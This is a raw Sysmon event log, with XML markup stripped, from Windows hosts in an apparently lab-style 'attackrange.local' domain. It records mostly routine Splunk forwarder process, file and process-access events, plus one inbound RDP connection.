AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977012Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.197{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FB5B60FDBD78B3E1FA3ACA0255D5E2D,SHA256=42F5E04940B7D305E911BC7FECBD981C0AEFE5865EFA4793B68F2E824F9C6213,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:28.243{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9DD8BB28B67CDB1611A3E5FFDF574C8,SHA256=503495DAA659EB054CEB554914205036D848C31BC4878BE6C01A016CCDFFFACD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977057Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.979{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9479D87CB12431F763E974992345CDC,SHA256=C09F9B89BEF782838B43283EEE1C2E32F173EA3A99859087C01F6CAD47C67282,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977056Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:26.065{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-49208-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000977055Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88E0-6151-8C79-00000000FD01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977054Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-88E0-6151-8C79-00000000FD01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977053Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977052Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977051Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88E0-6151-8C79-00000000FD01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977050Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977049Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977048Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977047Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977046Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977045Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977044Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.666{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977043Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.651{69CF5F33-88E0-6151-8C79-00000000FD01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977042Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.260{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F9AD7BA696F8CCC05C07AB1BB603314,SHA256=BF09C7E97EB2B4545FA7EA1CA4110435E674AF56E755D3096A7F7CAD20D0C7E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977041Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:28.166{69CF5F33-88DF-6151-8B79-00000000FD01}3284012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977072Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.557{69CF5F33-88E1-6151-8D79-00000000FD01}23762548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977071Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.432{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=650D206A01BA9135625072F4BDA61C80,SHA256=32766EDC721E0B87B3F57B55E8FE6EC884FDABBA112757C4FA89E49D9AC1BFD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:29.275{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=724C8A9DB2955079B2990F554D15B05C,SHA256=B0B6857AA902BFC47BD579F240851DFD2D08B5A081F79F27B764CEB15685949F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977070Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88E1-6151-8D79-00000000FD01}2376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977069Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977068Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977067Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977066Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977065Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977064Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977063Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 